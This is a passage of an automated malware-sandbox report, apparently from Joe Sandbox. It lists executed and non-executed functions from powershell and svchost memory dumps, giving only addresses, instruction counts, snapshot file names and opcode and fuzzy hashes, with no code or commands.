                                                                                          Function 04CD8810 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6c3c546e141acad15796a48b6c947b63d600e74b501df7d972226971bd6ef422
                                                                                          • Instruction ID: 95fe0d6cf30cfe04f02f5cc7adc09d3eded37df0c17cb51844749b8c589ee544
                                                                                          • Opcode Fuzzy Hash: 6c3c546e141acad15796a48b6c947b63d600e74b501df7d972226971bd6ef422
                                                                                          • Instruction Fuzzy Hash: 92D01234A1830A8F8748EF64D44646DBFB5E744200F008169DA5593345EA305851CBC1
                                                                                          Function 04CD7E90 Relevance: .0, Instructions: 13COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd33cbc61ddfa135182f65b583c49829893b7a1b21e96442837790a7dae4d694
                                                                                          • Instruction ID: 4b6876f7506a02e523c3bd4ee40d368017040e2d2001d446ae17de6a13c44be2
                                                                                          • Opcode Fuzzy Hash: fd33cbc61ddfa135182f65b583c49829893b7a1b21e96442837790a7dae4d694
                                                                                          • Instruction Fuzzy Hash: 44C0021551A7C45FEB03467118662157FB18D5391870A49C6EC818B1A3C9188C49DB61
                                                                                          Function 04CD7920 Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7e16b127903198811bbfa238dfa3fc8ed5bba971b0ac7f568436d9f684a478ca
                                                                                          • Instruction ID: 74e162f615fb0052d52d85e427bfa821e026070118adfb382911fbcd6c0233de
                                                                                          • Opcode Fuzzy Hash: 7e16b127903198811bbfa238dfa3fc8ed5bba971b0ac7f568436d9f684a478ca
                                                                                          • Instruction Fuzzy Hash: 95C08C39042388CBC3052B70A3009203B16EFC122979618C8E8490BBB7CB32988ACB00
                                                                                          Function 04CD7928 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0fac879d7ed3997eae1cb66597f04a255ebb1b86a45b402d15b32904add15dd1
                                                                                          • Instruction ID: 5c185019bc96e44a937b052744f5a0da943122264d57ef21b384b3c60083cd05
                                                                                          • Opcode Fuzzy Hash: 0fac879d7ed3997eae1cb66597f04a255ebb1b86a45b402d15b32904add15dd1
                                                                                          • Instruction Fuzzy Hash: 90B0923018574C8FC3486F75A804824732DEF4021538014A8E80E0B3B38F76E885CA44

                                                                                          Non-executed Functions

                                                                                          Function 04CD4D62 Relevance: 5.1, Strings: 4, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: &n^$&n^$&n^$&n^
                                                                                          • API String ID: 0-3386328252
                                                                                          • Opcode ID: a126a04ae45f14c83c5480b0d12ef9dc2fedbb0af327aa94c9e63843ea5763e7
                                                                                          • Instruction ID: 8abeb2ae0be9bc970d5a6d71aceab18eae0a6dd2a08fa60c795aa8e46ef83993
                                                                                          • Opcode Fuzzy Hash: a126a04ae45f14c83c5480b0d12ef9dc2fedbb0af327aa94c9e63843ea5763e7
                                                                                          • Instruction Fuzzy Hash: F831BA626093C19FC306DB3CC8946857FE2EF97254B0A51DBD2C4CF2A3DA24AC1AC756
                                                                                          Function 04CD4CC2 Relevance: 5.0, Strings: 4, Instructions: 38COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: &n^$&n^$&n^$&n^
                                                                                          • API String ID: 0-3386328252
                                                                                          • Opcode ID: d60c182eda89bde6346584b9f520039d18352388f45cb3655f0449ed0ca9fbde
                                                                                          • Instruction ID: add321ee61b7588eb51e96e1fae01c640caa267540a5e11d43ea509147cb9378
                                                                                          • Opcode Fuzzy Hash: d60c182eda89bde6346584b9f520039d18352388f45cb3655f0449ed0ca9fbde
                                                                                          • Instruction Fuzzy Hash: D7017C5790D3C19FC30A8B2588A82817F62FFB63D4B1A02DE80C88F0D3D925242B8707

                                                                                          Executed Functions

                                                                                          Function 019C23C8 Relevance: 3.0, Strings: 2, Instructions: 453COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2655331677.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_19c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: kWq^${Wq^
                                                                                          • API String ID: 0-477072019
                                                                                          • Opcode ID: 7cc496cee8af734d9d120042dcd22f5f20777a818474907dc9c5590d7fadb009
                                                                                          • Instruction ID: 745fd479130657a6cc11129d1fb4d3189b051c4e3425da650f26106c513079dc
                                                                                          • Opcode Fuzzy Hash: 7cc496cee8af734d9d120042dcd22f5f20777a818474907dc9c5590d7fadb009
                                                                                          • Instruction Fuzzy Hash: F9F18C34B012458FEB18AB78D858B6E3BB2FBC9705F10846CE5069B395DFB59D01CB92
                                                                                          Function 019C0AC1 Relevance: .2, Instructions: 232COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2655331677.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_19c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 34fcebb30764d8ebbb8bc2f0456b245f6a9a7660a32111265a059961ea421695
                                                                                          • Instruction ID: 56430d6bbc2fb0901a67c89ad481b8393fb971bf15482156661c85a3d19e74b8
                                                                                          • Opcode Fuzzy Hash: 34fcebb30764d8ebbb8bc2f0456b245f6a9a7660a32111265a059961ea421695
                                                                                          • Instruction Fuzzy Hash: DDA16D35D003098FCB15DFA8D8449DEBBB2FF89300F24866EE515AB255EB74A945CF80
                                                                                          Function 019C0848 Relevance: .2, Instructions: 181COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2655331677.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_19c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bfb266718eed85077ab672e072c16b4c907e5595363768fa7e1aefe25f1bc617
                                                                                          • Instruction ID: 3618b03ad6c5c9812c075239f75af9940385bb2c56b8e8f90bd1abd34b90e5ef
                                                                                          • Opcode Fuzzy Hash: bfb266718eed85077ab672e072c16b4c907e5595363768fa7e1aefe25f1bc617
                                                                                          • Instruction Fuzzy Hash: 71611B38B00605CFDB04DB69D854BADBBB6FF88711F1580A9E649DB361DA31DD01CB51
                                                                                          Function 019C23B8 Relevance: 2.8, Strings: 2, Instructions: 339COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2655331677.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_19c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: kWq^${Wq^
                                                                                          • API String ID: 0-477072019
                                                                                          • Opcode ID: e08b89011cfad1cb1d6338d433a349d35a25c136c9e3550b7bfed478782adf4c
                                                                                          • Instruction ID: ffbdac5cda740066200ce371d7cdc40f0919429cbca400a172e4561562b12fa6
                                                                                          • Opcode Fuzzy Hash: e08b89011cfad1cb1d6338d433a349d35a25c136c9e3550b7bfed478782adf4c
                                                                                          • Instruction Fuzzy Hash: D6D16C34B01245CFEB18AB78D85866E3BB2FBC9705F10852CE5069B394DFB99D41CB92
                                                                                          Function 019C24F8 Relevance: 2.8, Strings: 2, Instructions: 275COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2655331677.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_19c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: kWq^${Wq^
                                                                                          • API String ID: 0-477072019
                                                                                          • Opcode ID: 47aba182c6dc2b34813a4fb88e17ba4d13a4544abb2349eddb0001f02f880717
                                                                                          • Instruction ID: 0416212a5895069af71e1f738530a045c03d013904dcc490d6ef85bf1b2cd764
                                                                                          • Opcode Fuzzy Hash: 47aba182c6dc2b34813a4fb88e17ba4d13a4544abb2349eddb0001f02f880717
                                                                                          • Instruction Fuzzy Hash: DDA18C34B012058FEB18AB78D86476E3BB3FBC8701F14846CE94A9B394DF759D418B92
                                                                                          Function 019C07E0 Relevance: .2, Instructions: 159COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2655331677.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_19c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 669090dee5dfb861a978030722ff12187671867e434bb9ff200c496c88a76fad
                                                                                          • Instruction ID: 026ed21fe7095d2de9032e8a0aa71410989ec46c6c8e72f4823f7d4ffbe29c56
                                                                                          • Opcode Fuzzy Hash: 669090dee5dfb861a978030722ff12187671867e434bb9ff200c496c88a76fad
                                                                                          • Instruction Fuzzy Hash: F2516C39A00215CFDB04CF69C894BA9BBF6FF89714F198099E545EB362EA71DC01CB51
                                                                                          Function 019C0838 Relevance: .1, Instructions: 139COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2655331677.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_19c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1e607dc4ae6ec0bb10010b9164be6de4366ad4447c0fe076b473f786779b89a9
                                                                                          • Instruction ID: f4b605e275033ae1162d32fc51ceeeef8565d2086193bc1afcd0a35a621b9240
                                                                                          • Opcode Fuzzy Hash: 1e607dc4ae6ec0bb10010b9164be6de4366ad4447c0fe076b473f786779b89a9
                                                                                          • Instruction Fuzzy Hash: FC513B38B00605CFDB04DF69C994AA9BBB6BF89711F1580A9E945EB362DB31EC01CB51
                                                                                          Function 019C1DE8 Relevance: .1, Instructions: 93COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2655331677.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_19c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3ab42e74dd11e78cdbe45feac42683b697276a121e112aa2825d3bc958bfa078
                                                                                          • Instruction ID: 6fcaf95a53d4b1abfcc6bb51f5fad33126e13210fe34ffdc3b9a0fd304a68630
                                                                                          • Opcode Fuzzy Hash: 3ab42e74dd11e78cdbe45feac42683b697276a121e112aa2825d3bc958bfa078
                                                                                          • Instruction Fuzzy Hash: D8310E30B012928FCB089B78885067E7BF6BFC9600B1484ADD549DB386DE34DD0287A2
                                                                                          Function 019C0D90 Relevance: .1, Instructions: 87COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2655331677.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_19c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3b1441c65b5cba1beb3d6654c358166f6e16b2adc9dcafc685bf98a6b83a037c
                                                                                          • Instruction ID: 0bf8e86d32b83efd73492ee48f8cd38c16c0b826ffe09d072936e9ad1226b4cd
                                                                                          • Opcode Fuzzy Hash: 3b1441c65b5cba1beb3d6654c358166f6e16b2adc9dcafc685bf98a6b83a037c
                                                                                          • Instruction Fuzzy Hash: 17310931A0435A4FCB15EFB8981019E7FB2EFC3651B1485AEC555E7281EF345A09CBD2
                                                                                          Function 019C1DD8 Relevance: .1, Instructions: 86COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2655331677.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_19c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a4095b8d72591a0b97c85e9216fdfff2806766f17053994e9e29c6b481b4fd25
                                                                                          • Instruction ID: 9e1b20258a3f665fb4f2212016644914cb3aa5f7a6d79d5af89bfdb4274b3258
                                                                                          • Opcode Fuzzy Hash: a4095b8d72591a0b97c85e9216fdfff2806766f17053994e9e29c6b481b4fd25
                                                                                          • Instruction Fuzzy Hash: 3A210030B012968FCB48DB78985067E7BF6BFC9600F14887DD449DB386EE309D0297A2
                                                                                          Function 019C1BAA Relevance: .1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2655331677.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_19c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a2ba181e7dc243318408d7ed5b5f1a8974f96bc89808c44a364bc98d02713884
                                                                                          • Instruction ID: 6bf0a8407b477cd1b71caa5a97246b3ab327124254766875f13bf90cbb8c9735
                                                                                          • Opcode Fuzzy Hash: a2ba181e7dc243318408d7ed5b5f1a8974f96bc89808c44a364bc98d02713884
                                                                                          • Instruction Fuzzy Hash: 13315C74D0020ADFEB04EBB8D840AADBFB6FF89300F5045A9D505A7351EBB46E51CB52
                                                                                          Function 019C1CC8 Relevance: .1, Instructions: 74COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2655331677.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_19c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9828019355be89e4c0de4ea618fc26bf2c0e8da5db85087b5fc73acf921a5e41
                                                                                          • Instruction ID: a3bf7a492ffabdbb370cae026002119b0763fa41be3e955188d7a5b8c506d001
                                                                                          • Opcode Fuzzy Hash: 9828019355be89e4c0de4ea618fc26bf2c0e8da5db85087b5fc73acf921a5e41
                                                                                          • Instruction Fuzzy Hash: DC21A171F002498FDB04ABFD981826EBEEAFFD9310B14842DD54AD3386DD748D0247A2
                                                                                          Function 019C1BB8 Relevance: .1, Instructions: 70COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2655331677.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_19c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a6141b330dd34258569e1d87e3de9be51475499848ac12ed895473eaabd78a11
                                                                                          • Instruction ID: a77f966d3cb951748b00aff7f364a466e402d656e4f6de7a3e9c98880fd9e22f
                                                                                          • Opcode Fuzzy Hash: a6141b330dd34258569e1d87e3de9be51475499848ac12ed895473eaabd78a11
                                                                                          • Instruction Fuzzy Hash: 41214B74E0024ADFEB44EBB8D850AADBFB2FF89300F504569D505A7341EBB46A51CB52
                                                                                          Function 019C11CE Relevance: .1, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2655331677.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_19c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 54727ebecfbf500c565bbb434bde20ba1771c034a22bdd5e47240d1edab2ccb4
                                                                                          • Instruction ID: 8208179cbd6bde7945f0646dc6413d6e6b58edfa54b4172b100ccba42769aa21
                                                                                          • Opcode Fuzzy Hash: 54727ebecfbf500c565bbb434bde20ba1771c034a22bdd5e47240d1edab2ccb4
                                                                                          • Instruction Fuzzy Hash: 6E119E75B00209CBDF24DBF9E4182ED7FF6FB88752F100469E509E6286DB748A04CB65
                                                                                          Function 019C22D9 Relevance: .0, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2655331677.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_19c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 543e9322183b75d2c3cff797914ac4882ebe9034fa92d6525978775ed8d14fd9
                                                                                          • Instruction ID: 175e6edf20e485adef161f000a2f50f8937ab91a6bc7c7c5481f7ef65559a6bd
                                                                                          • Opcode Fuzzy Hash: 543e9322183b75d2c3cff797914ac4882ebe9034fa92d6525978775ed8d14fd9
                                                                                          • Instruction Fuzzy Hash: F811E374D0120AEFDB08EFE8E84169CBBB1FB84314F6095ADD515E7240EBB46B098F41
                                                                                          Function 019C22E8 Relevance: .0, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2655331677.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_19c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 51c3b9e491d0d27cfa0124a526e9cf4d4cfbc8c772deedff50e5c75fcf1eae10
                                                                                          • Instruction ID: 0e8832443e625082d3148f60d6eb9378c357f7d10db4fa08534c59f9f6cc0992
                                                                                          • Opcode Fuzzy Hash: 51c3b9e491d0d27cfa0124a526e9cf4d4cfbc8c772deedff50e5c75fcf1eae10
                                                                                          • Instruction Fuzzy Hash: 1711E274E0120AEFDB48EFE8E8415ADBBB1FB84300B6085ADD515E7244EBB46B05CF81
                                                                                          Function 019C0A78 Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2655331677.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_19c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd68c53d0e89510996eaaf5826931c3605800a969cfb56c9de037f73e9711cca
                                                                                          • Instruction ID: 8fe670c7978dd6b24c6b2d0a7f31b9d26084f8e8b94687af1762a7bb53557af4
                                                                                          • Opcode Fuzzy Hash: fd68c53d0e89510996eaaf5826931c3605800a969cfb56c9de037f73e9711cca
                                                                                          • Instruction Fuzzy Hash: EBF06D71D05249DFCB05CFB8E94059C7BB8EF8661472042EFC849EB112EA315F049B11
                                                                                          Function 019C0A88 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2655331677.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_19c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a2a7755a85624940de42a25d70e4b50435a076c0720a36becf72ecefdd0543d9
                                                                                          • Instruction ID: 890175890eb5d092da0e101e0a9355d599b56f4cf1a0b5389708bb5b8e248abf
                                                                                          • Opcode Fuzzy Hash: a2a7755a85624940de42a25d70e4b50435a076c0720a36becf72ecefdd0543d9
                                                                                          • Instruction Fuzzy Hash: D7D01770A0120EEF8B04DFB8E90055DBBB9EB45204B2086AD9908E7201EE316F009B81

                                                                                          Executed Functions

                                                                                          Function 057C23C8 Relevance: 3.0, Strings: 2, Instructions: 451COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2743751287.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_57c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: kwm^${wm^
                                                                                          • API String ID: 0-562886359
                                                                                          • Opcode ID: 257354fe5cbd647eeb58e9b8df9019b4fc44fa0eab51ca17251e75eb8c2a3cb4
                                                                                          • Instruction ID: cc80d51df473a1c9f6d9f0db1bdd0716eeedc408bf49a4e3c493d7b49fadb13b
                                                                                          • Opcode Fuzzy Hash: 257354fe5cbd647eeb58e9b8df9019b4fc44fa0eab51ca17251e75eb8c2a3cb4
                                                                                          • Instruction Fuzzy Hash: C9F16F34B012058FDB18EB78E858B6E7BB2FBC9701F1045ACE9069B395DF799C418B91
                                                                                          Function 057C0AC1 Relevance: .2, Instructions: 233COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2743751287.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_57c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2faa641b82d580960de4dcb8fd996c19200bb6662433794f52759b29fb8c1461
                                                                                          • Instruction ID: 3ea600151452d523cf55d4b53dd1781683a92323059418854dd8427600211b22
                                                                                          • Opcode Fuzzy Hash: 2faa641b82d580960de4dcb8fd996c19200bb6662433794f52759b29fb8c1461
                                                                                          • Instruction Fuzzy Hash: CAA17A35E00309CFCB15DFA8C8949DEFBB2FF89300B25866AD515AB254EB74A945CF80
                                                                                          Function 057C0848 Relevance: .2, Instructions: 181COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2743751287.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_57c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5f54bdf73b3176f34bb4098aa0aa15980f170975fe951560ac7fe6d0890f6b2e
                                                                                          • Instruction ID: 348c8d81f1bda02f0f03348b6a93d0562868c6401f9f1cd12dbcab139c39e2fb
                                                                                          • Opcode Fuzzy Hash: 5f54bdf73b3176f34bb4098aa0aa15980f170975fe951560ac7fe6d0890f6b2e
                                                                                          • Instruction Fuzzy Hash: FD610D38B00615CFDB14DB69D858BAEBBB6FF88711F1580A9E905AB365DB31DC01CB90
                                                                                          Function 057C23B8 Relevance: 2.8, Strings: 2, Instructions: 339COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2743751287.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_57c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: kwm^${wm^
                                                                                          • API String ID: 0-562886359
                                                                                          • Opcode ID: c4895e260018278bdb3ab0404c52f6160071d79ef5b5c97af82c58e5817dfc5d
                                                                                          • Instruction ID: 1597180daed64cbf0a82657ac286ab52ef876851f7c7ed0b57078abf06eb013b
                                                                                          • Opcode Fuzzy Hash: c4895e260018278bdb3ab0404c52f6160071d79ef5b5c97af82c58e5817dfc5d
                                                                                          • Instruction Fuzzy Hash: F1D14934B01205CFDB18EB78E86876D7AB2FB89301B1045ACD9069B799DF799C42CB91
                                                                                          Function 057C24F8 Relevance: 2.8, Strings: 2, Instructions: 275COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2743751287.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_57c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: kwm^${wm^
                                                                                          • API String ID: 0-562886359
                                                                                          • Opcode ID: 8b972be6ba05817605a2f72493982485fb72dc1a277d619e478724f01f0e3b18
                                                                                          • Instruction ID: 0b9b616cf02ef5c1da891ea063866ef09a37c7588944a5d7b5bfed29ea89e708
                                                                                          • Opcode Fuzzy Hash: 8b972be6ba05817605a2f72493982485fb72dc1a277d619e478724f01f0e3b18
                                                                                          • Instruction Fuzzy Hash: 43A16B38B01204CFDB18EB78D86876E7AA3FBC9310F1485ACD9069B795DF799C418B91
                                                                                          Function 057C0D90 Relevance: .2, Instructions: 191COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2743751287.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_57c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5a487b7e5ff8fd9e9c5dc79ea4e2fef56c8b8b3e38c062e76558c0ddfd63f458
                                                                                          • Instruction ID: dbf282d61481e86fc0a0de7bff32a51e3e893cf33357807b461e4c51f6248aec
                                                                                          • Opcode Fuzzy Hash: 5a487b7e5ff8fd9e9c5dc79ea4e2fef56c8b8b3e38c062e76558c0ddfd63f458
